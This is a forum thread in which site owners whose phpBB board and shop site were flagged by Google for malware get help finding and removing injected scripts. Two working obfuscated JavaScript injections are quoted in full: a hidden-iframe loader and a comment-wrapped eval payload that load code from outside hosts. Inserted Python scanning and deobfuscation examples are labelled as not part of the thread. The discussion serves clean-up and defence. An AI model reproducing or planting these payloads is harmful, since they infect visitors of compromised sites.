
Oh crap, my site seems to have been hijacked!!!

  • 13-05-2009 1:19pm
    #1
    Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭


    I have a website which is a PHPBB message board that never really took off so it just sits there and does not do much really.

    A few weeks ago when I went to check the site I got the following message:
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:929)

    I had no idea what it is, what it means or how to fix it - I can't be assed trying to so I just left it.

    However, just now I got an email from Google "Malware Notification":
    Dear site owner or webmaster of digitaldjforum.com,

    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
    Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
    http://digitaldjforum .com/the-chill-out-room-f2/
    http://www.digitaldjforum .com/the-chill-out-room-f2/
    http://www.digitaldjforum .com/the-chill-out-room-f2/sweet-watches-t326.html
    Here is a link to a sample warning page:
    http://www.google.com/interstitial?url=http%3A//digitaldjforum.com/the-chill-out-room-f2/
    We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
    1) the site was compromised
    2) the site doesn't monitor for malicious user-contributed content
    3) the site displays content from an ad network that has a malicious advertiser

    If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
    http://www.stopbadware.org/home/security
    Once you've secured your site, you can request that the warning be removed by visiting
    http://www.google.com/support/webmasters/bin/answer.py?answer=45432
    and requesting a review. If your site is no longer harmful to users, we will remove the warning.
    Sincerely,

    WFT??? What can I do here?



Comments

  • Registered Users Posts: 68,317 ✭✭✭✭seamus


    What version of phpBB is it? I've seen this before, should be simple enough to fix if you google your version of phpBB


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭Zascar


    Thanks Seamus, It's PHPBB 3 - not sure exact version though


  • Registered Users Posts: 35,524 ✭✭✭✭Gordon


    Why fix it when you can just delete the whole site if you don't use it?


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭Zascar


    Well, I don't do much with it cause I don't have the time, but I'd like to get it back working as I do get a trickle of posts and I might look at it one day and start back working on it...


  • Registered Users Posts: 9,225 ✭✭✭Chardee MacDennis


    here's your problem
    <script type="text/javascript">var GdpldPBsdvjorQSwfbuS = "kw60kw105kw102kw114kw97kw109kw101kw32kw119kw105kw100kw116kw104kw61kw34kw52kw56kw48kw34kw32kw104kw101kw105kw103kw104kw116kw61kw34kw54kw48kw34kw32kw115kw114kw99kw61kw34kw104kw116kw116kw112kw58kw47kw47kw100kw111kw119kw110kw108kw111kw97kw100kw45kw49kw50kw51kw46kw99kw110kw47kw118kw116kw105kw97kw100kw109kw105kw110kw50kw47kw116kw46kw112kw104kw112kw34kw32kw115kw116kw121kw108kw101kw61kw34kw98kw111kw114kw100kw101kw114kw58kw48kw112kw120kw59kw32kw112kw111kw115kw105kw116kw105kw111kw110kw58kw114kw101kw108kw97kw116kw105kw118kw101kw59kw32kw116kw111kw112kw58kw48kw112kw120kw59kw32kw108kw101kw102kw116kw58kw45kw53kw48kw48kw112kw120kw59kw32kw111kw112kw97kw99kw105kw116kw121kw58kw48kw59kw32kw102kw105kw108kw116kw101kw114kw58kw112kw114kw111kw103kw105kw100kw58kw68kw88kw73kw109kw97kw103kw101kw84kw114kw97kw110kw115kw102kw111kw114kw109kw46kw77kw105kw99kw114kw111kw115kw111kw102kw116kw46kw65kw108kw112kw104kw97kw40kw111kw112kw97kw99kw105kw116kw121kw61kw48kw41kw59kw32kw45kw109kw111kw122kw45kw111kw112kw97kw99kw105kw116kw121kw58kw48kw34kw62kw60kw47kw105kw102kw114kw97kw109kw101kw62";var cyFDWFBHQiyWMnIpDJig = GdpldPBsdvjorQSwfbuS.split("kw");var ERVwiosNQnfsmlwIqxQG = "";for (var gOdsCliGvQnAiIwQxpeN=1; gOdsCliGvQnAiIwQxpeN<cyFDWFBHQiyWMnIpDJig.length; gOdsCliGvQnAiIwQxpeN++){ERVwiosNQnfsmlwIqxQG+=String.fromCharCode(cyFDWFBHQiyWMnIpDJig[gOdsCliGvQnAiIwQxpeN]);}document.write(ERVwiosNQnfsmlwIqxQG)</script>
    

    get that out of all your pages for a start...


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭Zascar


    Sorry to drag up old thread, but I never did anything about this, but need to now...

    BastardPrince thanks for that, I removed this code but still no change. Not sure what to do now...


  • Registered Users Posts: 213 ✭✭Hoku


    You could always try a re-install. Back up the database first via phpMyAdmin, since the board seems inaccessible. Back up any customizations you made to the board.

    After you have the DB backed up, delete everything from the directory. Do a fresh install, then restore the DB.
    If nothing breaks at this point, then you're good to start restoring all your custom bits.

    Surprising that phpBB3 became injected with this, isn't it supposed to be more secure than its predecessor? I had a phpBB2 board for a fairly long time, and all I had to deal with was the spam. No security breaches though...


  • Registered Users Posts: 9,579 ✭✭✭Webmonkey


    Zascar I can place a bet that it is a .htaccess file redirecting or proxying the requested address through a parser script that will embed that code.


  • Closed Accounts Posts: 70 ✭✭The BOFH


    There's been a recent attack on SMF forums using a PHP script embedded in a gif that gets uploaded as an avatar, it corrupts the database too. I'd recommend getting on the forums to check for updates & install the latest version, there might be scripts to clean the database too. Don't allow any folders with permissions higher than 755 or files higher than 644 & don't allow uploads to your site. If you are on shared hosting it might have come from another site on the shared server being compromised or a higher level attack on the host.


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭Zascar


    Hmmm ok thanks guys. I'm a bit lost as to what to do really as I'm not a web programmer - I can play about with blogs and forums etc but have no idea when it comes to the more complex stuff. Anyone fancy helping me out, nixer even?
    Cheers


  • Registered Users Posts: 213 ✭✭Hoku


    I could take a look for you.


    EDIT: A-a-and sorted. =) Something inserted that Javascript into the auth.php file.
    It's time to ask Mr. Google to remove you from the naughty list.


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭Zascar


    Thanks to Hoku who fixed the problem for me. Unfortunately even though it is now gone, the warnings etc are not. A search for "Digital DJ forum" on Google still gives a warning "this site may harm your computer" - same with irishdjforum and even zascar.com (all on same host). The thing is that I'm even getting it on my personal blog (different host) - simply because there are links between the sites (streaming embedded file).

    So now I have to contact google and get them to review the site to remove the malware message. Any idea how I do this?


  • Registered Users Posts: 213 ✭✭Hoku


    Head over to the Webmaster Tools and do like so:
    Google wrote:
    1. On the Webmaster Tools Home page, select the site you want.
    2. In the Parts of this site may be distributing malware message, click More details.
    3. Click Request a review.


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭Zascar


    Ahh now I see. I have to have my sites "Verified" first, but because of these damn warning messages I cannot get into my control panel!
    I'm sure I can find another way around it but it's a real pain...


  • Registered Users Posts: 410 ✭✭B1977


    I have got the same message off Google for my website as well, anyone out there that can find the problem?


  • Registered Users Posts: 213 ✭✭Hoku


    Check your website's HTML Source, and see if there's any funny-looking code there, like Javascript that doesn't seem to make any sense at all. Then find the actual file containing that code and delete it.
    That was the procedure I followed because phpBB told me where an error occurred. Could be more difficult if you're using a CMS and it doesn't show any PHP errors.

    When you're done with that, check at the bottom of page 1 on this thread, how to contact Google and ask them to review your website.
    In case your site isn't verified, you may need to contact Google's tech support directly, if there is such an option.


  • Registered Users Posts: 410 ✭✭B1977


    I reloaded the original website homepage and still get the message and verified the site


  • Registered Users Posts: 213 ✭✭Hoku


    PM me the link, I'm sure my firewall will keep me safe from whatever is hiding on your page.
    And if not, I have back-ups... *format* :pac:


  • Registered Users Posts: 410 ✭✭B1977


    There's the HTML source code.
    Are there any problems with this?

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>


    <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />

    <title>The Magic Shop</title>
    <meta name="robots" content="Index,Follow" />
    <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
    <meta name="resource-type" content="document" />
    <meta name="audience" content="all" />
    <meta name="distribution" content="global" />
    <meta name="robots" content="ALL" />
    <meta name="revisit-after" content="2 days" />
    <meta name="Description" content=
    "The Magic Shop has loads of great tricks, books, costumes and much more to help you become an amazing magician! Great fun for all ages, at home or at parties!" />
    <meta name="Keywords" content=
    "Magic, Shop, Limerick, jokes, tricks, cards, cheap, great, fun, costumes, make, up, dvd, books, coins, wigs, ireland, party, cool, mentalism, crazy, funny, paint, redox, designs, all, ages, amazing, wow, magician" />
    <link href="style.css" rel="stylesheet" type="text/css" />
    <link rel="stylesheet" href="lightbox.css" type="text/css" media="screen" />
    <script type="text/javascript" src="js/prototype.js">
    </script>
    <script type="text/javascript" src="js/scriptaculous.js?load=effects,builder">
    </script>
    <script type="text/javascript" src="js/lightbox.js">
    </script>
    </head>
    <meta name="verify-v1" content="v5wEcf1QB4DisylMb7G1gL2ELgehRmEjLcGxgjM2bIg=" >
    <body>
    <center>
    <div id="date">
    <script language="javascript" type="text/javascript">
    //<![CDATA[
    document.write(""+Date()+".")
    //]]>
    </script>
    </div>

    <div id="sign">
    <table width="800">
    <tr>
    <td width="50%" align="left">
    061 341839<br />
    086 2563681<br />
    087 6492126
    </td>
    <td width="50%" align="right">
    6 Mallow Street<br />
    Limerick<br />
    Ireland
    </td>
    </tr>
    </table>
    </div>

    <div id="container">
    <div class="menu">
    <ul>
    <li><a href="index.html" title="Home">Home</a></li>

    <li><a href="costumes.html" title="">Costumes</a></li>

    <li><a href="cards.html" title="">Cards</a></li>

    <li><a href="coins.html" title="">Coins</a></li>

    <li><a href="books.html" title="">Books</a></li>

    <li><a href="tricks.html" title="">Tricks</a></li>

    <li><a href="makeup.html" title="">Make Up</a></li>

    <li><a href="contact.html" title="">Contact</a></li>
    </ul>
    </div>

    <table cellspacing="0" cellpadding="0">
    <tr>
    <td>
    <div id="logo">
    <iframe src="new.html" name="new" scrolling="no" frameborder="0" align="middle" height="205px" width="800px" id="new"></iframe>
    </div>
    </td>
    </tr>

    <tr>
    <td>
    <div id="bar">
    <div id="left_bar">
    Catagories
    </div>

    <div id="right_bar">
    Welcome to the Magic Shop
    </div>
    </div>
    </td>
    </tr>

    <tr>
    <td>
    <div id="main">
    <div id="sidebar">
    <a href="books.html">Books</a><br />
    <a href="cards.html">Cards</a><br />
    <a href="coins.html">Coins</a><br />
    <a href="costumes.html">Costumes</a><br />
    <a href="dvds.html">Dvds</a><br />
    <a href="jokes.html">Jokes</a><br />
    <a href="makeup.html">Make Up</a><br />
    <a href="mentalism.html">Mentalism</a><br />
    <a href="tricks.html">Tricks</a><br />
    <a href="wigs.html">Wigs</a><br />
    </div>

    <div id="content">
    <div id="shop"><img src="images/shop.png" alt=" The Magic Shop " border="0" /></div>

    <h1>Welcome</h1>

    <p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aliquam eget augue vitae
    risus malesuada ullamcorper. Aenean a metus at dui molestie laoreet. Integer imperdiet,
    augue nec pellentesque aliquet, tortor nulla pharetra magna, non laoreet mauris libero ac
    pede. Curabitur vestibulum ullamcorper diam. Donec quam felis, elementum in, auctor eu,
    aliquet at, diam. Proin euismod leo ut sem. Curabitur sapien. Ut massa. Nunc in risus
    vitae nibh vehicula vulputate. Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
    Maecenas gravida luctus dolor. Phasellus bibendum. Vestibulum aliquet tortor et
    dolor.</p>

    <p>Duis eu dui sit amet erat eleifend consequat. Vivamus risus. Sed leo justo, hendrerit
    non, vulputate id, fermentum eget, ipsum. Fusce et diam. Curabitur a lectus. Aenean ac
    ligula nec neque adipiscing elementum. Pellentesque vitae nisl eu massa pellentesque
    sagittis. Nam vitae justo eget tortor malesuada interdum. Ut nec est nec arcu faucibus
    varius. Ut malesuada. Nulla accumsan. Sed augue sapien, sollicitudin et, congue non,
    sollicitudin convallis, enim. Integer id ipsum. Fusce et orci. Praesent in ligula. Donec
    vel elit. Aenean ante mi, sollicitudin pharetra, sollicitudin in, dictum vitae,
    lacus.</p>

    <p>Donec mauris libero, porttitor in, commodo commodo, congue a, urna. Morbi facilisis
    arcu. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos
    himenaeos. Phasellus pretium nibh tempus justo. Nullam varius, massa tincidunt viverra
    vestibulum, purus tortor interdum eros, et consequat risus enim eu elit. In eleifend
    rutrum erat. Maecenas pharetra metus vel ipsum. Sed varius metus a nunc. Vestibulum
    aliquet, nunc sed adipiscing ultrices, urna erat imperdiet sapien, id gravida dui tortor
    in turpis. Quisque gravida scelerisque dui. Donec imperdiet scelerisque leo.</p>
    </div>
    </div>
    </td>
    </tr>

    <tr>
    <td>
    <div id="bot"></div>
    </td>
    </tr>

    <tr>
    <td>
    <div class="menu">
    <ul>
    <li><a href="index.html" title="Home">Home</a></li>

    <li><a href="costumes.html" title="">Costumes</a></li>

    <li><a href="cards.html" title="">Cards</a></li>

    <li><a href="coins.html" title="">Coins</a></li>

    <li><a href="books.html" title="">Books</a></li>

    <li><a href="tricks.html" title="">Tricks</a></li>

    <li><a href="makeup.html" title="">Make Up</a></li>

    <li><a href="contact.html" title="">Contact</a></li>
    </ul>
    </div>
    </td>
    </tr>

    <tr>
    <td>
    <div id="footer">
    Copyright 2008 © The Magic Shop
    </div>
    </td>
    </tr>
    </table>
    </div>

    <div id="redox">
    <a href="http://www.redoxdesigns.com" target="_BLANK">RedoxDesigns.com</a>

    <div>
    <p><!-- Start of StatCounter Code -->
    <script type='text/javascript'>
    //<![CDATA[
    var sc_project=3937707;
    var sc_invisible=0;
    var sc_partition=47;
    var sc_click_stat=1;
    var sc_security='bf276033';
    //]]>
    </script> <script type='text/javascript'>
    </script><noscript>
    <div class='statcounter'>
    <a href='http://www.statcounter.com/' target='_blank'><img class='statcounter' alt='best counter' /></a>
    </div></noscript>
    <!-- End of StatCounter Code --></p>
    </div>
    </div>
    </center>
    </body>
    </html>


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭Zascar


    After fixing it you need to go into your Google Webmaster tools, verify the site, and then "request a review" to get rid of the warning. I just did it but not sure how long it will take


  • Registered Users Posts: 410 ✭✭B1977


    It's the fixing of it that is the problem. Every time I edit and reload the page, Google contact me a few days later with a message that there is a problem


  • Registered Users Posts: 213 ✭✭Hoku


    Everybody agree that this code looks a bit 'shady' and malicious?
    <!-- 
    (function(){var jwm='%';var bS88='@76@61r@20@61@3d@22@53criptE@6egi@6e@65@22@2cb@3d@22V@65rsio@6e@28)@2b@22@2c@6a@3d@22@22@2cu@3d@6e@61vig@61tor@2euserAgent@3bif((u@2ei@6edexO@66(@22C@68rom@65@22@29@3c0)@26@26(@75@2eind@65xOf(@22@57in@22)@3e0)@26@26(u@2eindex@4ff(@22NT@206@22)@3c0)@26@26(@64@6fc@75ment@2e@63ooki@65@2ein@64exOf(@22m@69ek@3d1@22)@3c0@29@26@26@28type@6ff(zrv@7a@74@73@29@21@3dtypeo@66(@22A@22))@29@7b@7ar@76zt@73@3d@22@41@22@3b@65val@28@22@69f(wind@6fw@2e@22+a+@22)j@3dj+@22+a@2b@22Ma@6aor@22+b+@61+@22Mino@72@22+b@2ba+@22Build@22+b+@22j@3b@22@29@3bdocu@6de@6et@2e@77@72i@74e@28@22@3cscript@20s@72@63@3d@2f@2f@6dar@74@75@22+@22z@2ecn@2f@76@69d@2f@3fid@3d@22+@6a+@22@3e@3c@5c@2fsc@72ipt@3e@22@29@3b@7d';var PnXo=bS88.replace(/@/g,jwm);var NTw=unescape(PnXo);eval(NTw)})();
     -->
    

    I'm no Javascript expert but I'm quite sure your Google doesn't like such rubbish.

    Open up all of your .js files and you'll find this at the bottom of them all. Delete it but be careful not to touch any ; or } as that would break the code.


  • Registered Users Posts: 213 ✭✭Hoku


    Just the bits between <!-- and --> and the tags themselves - so the bottom of that file will look like so:
    }}, arguments[1] || {}));
    }
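
The clean-up described in this thread (find the files carrying the injected script, cut only the trailing `<!-- ... -->` block from .js files, keep directories at 755 and files at 644) can be run over a whole web root. This is an added example, not code posted by anyone in the thread; the sample tree, file contents and function names are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Indicators drawn from the two injected snippets quoted in this thread (review hints only).
INDICATORS = {
    "unescape() feeding eval()": re.compile(r"unescape\s*\([^\n]{0,200}eval\s*\("),
    "fromCharCode feeding document.write()":
        re.compile(r"String\.fromCharCode[^\n]{0,200}document\.write"),
}
# Self-invoking function wrapped in an HTML comment at the very end of a file.
TAIL = re.compile(r"\s*<!--\s*\(function\(\)\{.*?\}\)\(\);\s*-->\s*\Z", re.S)
WEB_EXT = (".js", ".php", ".html", ".htm")

def strip_injected_tail(text):
    """Return (cleaned_text, removed); the script's own closing ; and } are kept."""
    if not TAIL.search(text):
        return text, False
    return TAIL.sub("", text) + "\n", True

def scan(root):
    """Walk a web root and return sorted (relative_path, finding) pairs."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            rel = os.path.relpath(path, root)
            is_dir = os.path.isdir(path)
            # Assumed reading of the 755/644 advice: no permission bits beyond those.
            limit = 0o755 if is_dir else 0o644
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & ~limit:
                findings.append((rel, "mode %o exceeds %o" % (mode, limit)))
            if is_dir or not name.lower().endswith(WEB_EXT):
                continue
            with open(path, errors="replace") as fh:
                text = fh.read()
            for label, pattern in INDICATORS.items():
                if pattern.search(text):
                    findings.append((rel, label))
            if name.lower().endswith(".js") and strip_injected_tail(text)[1]:
                findings.append((rel, "injected trailing comment block"))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample web root; file names and contents are made up."""
    root = tempfile.mkdtemp()
    tail = "<!--\n(function(){var n=unescape('%61');eval(n)})();\n -->\n"
    files = {"lightbox.js": ("function ok(){return 1;}\n" + tail, 0o644),
             "style.js": ("function fine(){return 2;}\n", 0o666),
             "auth.php": ("<script>o+=String.fromCharCode(60);"
                          "document.write(o)</script>\n", 0o644)}
    for name, (body, mode) in files.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
        os.chmod(os.path.join(root, name), mode)
    return root

if __name__ == "__main__":
    for rel, finding in scan(build_sample_tree()):
        print(rel, "->", finding)
```

`scan()` only reports; write the output of `strip_injected_tail()` back to a file after comparing it with a known-good copy of that script.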
    


  • Registered Users Posts: 410 ✭✭B1977


    Everything else seems to be written in black ink and the malware, or whatever it is, is in grey


  • Registered Users Posts: 213 ✭✭Hoku


    It's because the <!-- --> tags signify a HTML comment, or in this case a malicious code. Your editor is just parsing these tags as any other HTML comment, whereas Google reads inside the comment and sees that nasty piece of work.


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    Hoku wrote: »
    Everybody agree that this code looks a bit 'shady' and malicious?
    <!-- 
    (function(){var jwm='%';var bS88='@76@61r@20@61@3d@22@53criptE@6egi@6e@65@22@2cb@3d@22V@65rsio@6e@28)@2b@22@2c@6a@3d@22@22@2cu@3d@6e@61vig@61tor@2euserAgent@3bif((u@2ei@6edexO@66(@22C@68rom@65@22@29@3c0)@26@26(@75@2eind@65xOf(@22@57in@22)@3e0)@26@26(u@2eindex@4ff(@22NT@206@22)@3c0)@26@26(@64@6fc@75ment@2e@63ooki@65@2ein@64exOf(@22m@69ek@3d1@22)@3c0@29@26@26@28type@6ff(zrv@7a@74@73@29@21@3dtypeo@66(@22A@22))@29@7b@7ar@76zt@73@3d@22@41@22@3b@65val@28@22@69f(wind@6fw@2e@22+a+@22)j@3dj+@22+a@2b@22Ma@6aor@22+b+@61+@22Mino@72@22+b@2ba+@22Build@22+b+@22j@3b@22@29@3bdocu@6de@6et@2e@77@72i@74e@28@22@3cscript@20s@72@63@3d@2f@2f@6dar@74@75@22+@22z@2ecn@2f@76@69d@2f@3fid@3d@22+@6a+@22@3e@3c@5c@2fsc@72ipt@3e@22@29@3b@7d';var PnXo=bS88.replace(/@/g,jwm);var NTw=unescape(PnXo);eval(NTw)})();
     -->
    

    I'm no Javascript expert but I'm quite sure your Google doesn't like such rubbish.

    Hex to text for the obfuscated text gives:
    va a="nne"="en(+",j="",=naa.;.fhe")&&u.e"W"&&.&#222;""&&du.ce."")&&(zts)!=f"){zvs="A";e("o.""="+"j"a"r""";")n.wr("< rc=//tu""/v/?="j"><\/r>");}
    

    I don't like that. Pop the 'cript', 'rsion' and other plain text stuff back in and it does look shady indeed.
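
Both encodings quoted in this thread (the `kw`-delimited character codes and the `@`-for-`%` escapes) can be decoded statically, keeping the plain-text characters in place and never executing the script. This is an added example, not code posted by anyone in the thread; the sample scripts and the `injected.example` host are constructed, and the function names are illustrative.

```python
import re


def decode_delimited_charcodes(blob, delim):
    """Scheme 1: decimal character codes joined by a delimiter ('kw60kw105...')."""
    parts = blob.split(delim)[1:]  # the loader's loop starts at index 1
    return "".join(chr(int(p)) for p in parts if p.isdigit())


def decode_substituted_percent(blob, marker):
    """Scheme 2: %XX escapes with '%' swapped for a marker; other characters
    are literal and must be kept, or the result is unreadable."""
    pattern = re.compile(re.escape(marker) + r"([0-9A-Fa-f]{2})")
    return pattern.sub(lambda m: chr(int(m.group(1), 16)), blob)


def deobfuscate(script):
    """Pick the scheme from the loader's own calls and decode its longest
    string literal. Nothing from the script is executed."""
    literals = [m.group(2) for m in re.finditer(r"""(["'])(.*?)\1""", script, re.S)]
    if not literals:
        raise ValueError("no string literal found")
    blob = max(literals, key=len)
    split = re.search(r"""\.split\(\s*(["'])(.+?)\1\s*\)""", script)
    if split and "fromCharCode" in script:
        return decode_delimited_charcodes(blob, split.group(2))
    swap = re.search(r"\.replace\(\s*/(.+?)/g", script)
    if swap and "unescape" in script:
        return decode_substituted_percent(blob, swap.group(1))
    raise ValueError("no known encoding scheme found")


def loaded_resources(decoded):
    """URLs the decoded markup would make a browser fetch."""
    return re.findall(r"""src\s*=\s*["']?([^"'\s>]+)""", decoded)


# Constructed samples (benign, not the payloads quoted in the thread).
PLAIN_1 = '<iframe width="1" height="1" src="http://injected.example/t.php"></iframe>'
SAMPLE_1 = ('var s = "' + "".join("kw%d" % ord(c) for c in PLAIN_1) + '";'
            'var p = s.split("kw");var o = "";for (var i=1; i<p.length; i++)'
            '{o+=String.fromCharCode(p[i]);}document.write(o)')
PLAIN_2 = 'document.write("<script src=//injected.example/v/?id=1></script>");'
SAMPLE_2 = ("(function(){var m='%';var b='"
            + "".join("@%02x" % ord(c) if i % 2 else c for i, c in enumerate(PLAIN_2))
            + "';var p=b.replace(/@/g,m);var n=unescape(p);eval(n)})();")

if __name__ == "__main__":
    for sample in (SAMPLE_1, SAMPLE_2):
        text = deobfuscate(sample)
        print(text, "->", loaded_resources(text))
```

The host names returned by `loaded_resources()` are what to look for in server logs and in the other files on the account.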


  • Registered Users Posts: 410 ✭✭B1977


    Hopefully all this code has been removed now. I'll have to allow Google to check it again,

    thanks for your help


  • Registered Users Posts: 410 ✭✭B1977


    The website was in Google's top ten, but is off the radar now. Is there any way of trying to get the site back on to the first page of Google?


  • Moderators, Motoring & Transport Moderators, Music Moderators Posts: 12,778 Mod ✭✭✭✭Zascar


    That's a good point. I'd say this seriously affects Google's ranking of you. Does it come back eventually?

